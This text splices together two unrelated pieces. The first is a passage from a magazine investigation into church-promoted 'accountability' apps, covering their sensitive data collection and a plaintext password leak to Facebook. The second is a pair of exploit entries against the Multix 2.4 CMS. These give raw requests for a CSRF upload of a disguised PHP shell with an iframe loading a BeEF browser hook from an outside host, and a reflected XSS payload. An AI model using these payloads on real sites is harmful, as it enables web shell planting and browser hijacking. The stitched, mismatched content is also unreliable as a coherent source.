While accountability apps are largely marketed to parents and families, some also advertise their services to churches. Accountable2You, for example, advertises group rates for churches or small groups and has set up several landing pages for specific churches where members can sign up. Covenant Eyes, meanwhile, employs a director of Church and Ministry Outreach to help onboard religious organizations.

Accountable2You did not respond to WIRED’s requests for comment.

Eva Galperin is director of cybersecurity at the Electronic Frontier Foundation, a digital rights nonprofit, and cofounder of the Coalition Against Stalkerware. Galperin says consent to such surveillance is a major concern. “One of the key elements of consent is that a person can feel comfortable saying no,” she says. “You could argue that any app installed in a church setting is done in a coercive manner.” While WIRED did not speak to anyone who was unaware that the app was on their phone, which is often the case with spyware, Hao-Wei Lin says he didn’t feel like he was in a position where he could say no to his church leader when he was asked to install Covenant Eyes. Gracepoint had secured him a $400-a-month apartment in Berkeley, where he was attending college. Without the church’s support, he might have had nowhere to live.

But this is not the experience of everyone we spoke to. James Nagy is a former Gracepoint church member who, as a one-time congregation leader, was on both sides of Covenant Eyes reports. Nagy, who is gay, was taught from a young age that homosexuality was a sin. So when Gracepoint offered him a software solution that claimed to be able to help what he then considered to be a moral dilemma, he jumped at the opportunity. He says that while he believed many people at Gracepoint were pressured to install the app, in his case, the pressure came from himself. “Gracepoint didn’t try to change me,” Nagy says. “I tried to change me.” Nagy is now an elder at the Presbyterian Church (USA) and until 2021 was a facilitator with the Reformation Project, a nonprofit whose mission is to advance LGBTQ inclusion in the church.

In the quest to curb behavior churches deem immoral, these accountability apps will collect and store extremely sensitive personal information from their users, including from those under the age of 18. Fortify, which describes itself as an addiction recovery app, asks its users to log information about when they last masturbated, where they were when it happened, and what device they used. While Fortify’s privacy policy states that the company doesn’t sell or otherwise share this data with third parties, its policy does allow it to share data with trusted third parties to perform statistical analysis, though it does not mention who these trusted third parties are. In a phone call, Clay Olsen, the CEO of Fortify parent company Impact Suite, clarified that these trusted third parties include companies like Mixpanel, an analytics service company that tracks user interactions with web and mobile applications.

While WIRED found several churches recommending Fortify to their congregations, Olsen says neither Fortify nor Impact Suite count religious institutions as customers.

When WIRED tested the Fortify software, we found that the app also utilizes other technology to track users. For instance, because it includes Facebook’s Pixel, data related to Fortify’s masturbation-tracking form is sent to Facebook. While the data does not appear to include the contents of the tracking form, it does have metadata about the form itself, including when it was filled out. Facebook appears to store that data and, when possible, associates it with a user’s account. After setting up a test account with Facebook, logging in, and then interacting with Fortify, we were able to see interactions with Fortify in a copy of the test account’s data obtained through Facebook’s privacy center.

Fortify’s inclusion of Facebook’s Pixel isn’t just a privacy issue, it’s a security problem. While testing the app, we also noticed that the password to our account was sent in plaintext to Facebook in the URL of the tracking requests. Facebook claims to have filtering mechanisms to prevent its systems from storing this type of personal information, but Fortify’s apparent oversight is still concerning to experts like Galperin. “That’s a huge vulnerability,” she says. “It’s the sort of behavior that makes me feel like they don’t have security experts reviewing the app or its policies.”

Facebook spokesperson Emil Vazquez says companies that share sensitive user data with the Meta-owned social media platform are violating its policies. “Advertisers should not send sensitive information about people through our Business Tools. Doing so is against our policies,” Vazquez says. “Our system is designed to filter out potentially sensitive data it is able to detect.” Facebook did not say whether its filters detected the plaintext passwords sent by Fortify.

After being notified of the password issue, Olsen said Fortify would stop transmitting users’ unencrypted passwords to Facebook. As we went to press, the issue had not yet been addressed.

Hao-Wei Lin has since moved on from Gracepoint but is still processing the trauma he feels the church has caused him. I met him earlier this month at his thesis exhibition at Parsons School of Design in New York City, where he is about to get his Master of Fine Arts in photography. He tells me that it was only after he went back to school that he felt he was in a safe enough space to start processing what he went through at Gracepoint.

Hao-Wei Lin’s photography was somber, but not without humor. One was of a 3D rendering of a room where he says he and other members of Gracepoint would meet after their Sunday service. A solitary figure is hunched over praying, his head resting in the seat of his plastic chair. As I look at the photo, Hao-Wei Lin tells me he wants the viewer to feel like they are a surveillance camera perched in the top corner of the room. The name of his work: “Covenant Eyes.”

The Ungodly Surveillance of Anti-Porn ‘Shameware’ Apps

Multix version 2.4 suffers from a cross site request forgery vulnerability.

    # Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Cross Site Request Forgery# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596# Version: Version 2.4# Tested on Ubuntu 18.04-------Request-----------POST /admin/file/add HTTP/1.1Host: localhostContent-Length: 466Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE0mBtYGic6umB5VeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/admin/file/addAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1;Connection: close------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="file_title"<iframe src="http://local.proxy:3000/?url=http://localhost/beefhook.html"></iframe>------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="file_name"; filename="shell2.php .jpg"Content-Type: imageasdasd------WebKitFormBoundaryE0mBtYGic6umB5VeContent-Disposition: form-data; name="form1"------WebKitFormBoundaryE0mBtYGic6umB5Ve--

Multix 2.4 Cross Site Request Forgery

Multix version 2.4 suffers from a cross site scripting vulnerability.

    # Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Reflected Cross Site Scripting# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596# Version: Version 2.4# Tested on Ubuntu 18.04-------Request-----------POST /search HTTP/1.1Host: localhostContent-Length: 24Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Origin: http://localhostUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyReferer: http://localhost/searchAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlRwa1o2cDhxRGtqTUxKL2tLS0NiVGc9PSIsInZhbHVlIjoiajVqT2VOeTk5RmVXY20yaG44ekFQbTc4OFZ3K2EvbThhTFFVUjBzdVpZNmtDQVlocndZU1pEeWFlaURPWDl3V2JsZGFxeDYyR1NWRGoyVHRDYW9iVExUck12NTNjVHZ3VWF2eHNWN1dScXNRdW81ZUNPeldnZ2FRdHVxODlsWnI1cDhWOEcvQlZWSi83VEM5WTJNNC9CME5PWVVyU2dDNWhNcUlvSXU1UWlsQjF2eTYxdmQ2aW5EZHNkYVBQMUpObEN2aFp6Y0tvUkhrUkFac0ZveURZZ0NFMHlPWjRYYSs0eTNTR3VPVXZUMD0iLCJtYWMiOiJjYmU1ZWYxODJlZjYyNzAyODI5YjM4NWEzMDgyYWFkMzA2YmIzOWM3ODA3ZjgyNjMzZWRjMDc3MDkxNWEzZGQ3In0%3D; ci_session=b3568d851b75f1b0191447e7b8ba35860e8c8e56; twk_idm_key=-J__vZrlSOiy2FYLE4Fsu; TawkConnectionTime=0; twk_uuid_5a7c31ded7591465c7077c48=%7B%22uuid%22%3A%221.AGEpC4jGGoH2T6v2QAlePuWJRFfI9oZIu0RUbaNluAgJJzDJQ1zFcS1Fv9uH7mP6PIgcXCE6JVCXLF7JZsX0kHOsQNihqwO81D79ESmlYkVwYf5UHnjWKkJkiJPYK7Dn%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1663795200266%7DConnection: closesearch_string=<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>&form1=

Tag

#apple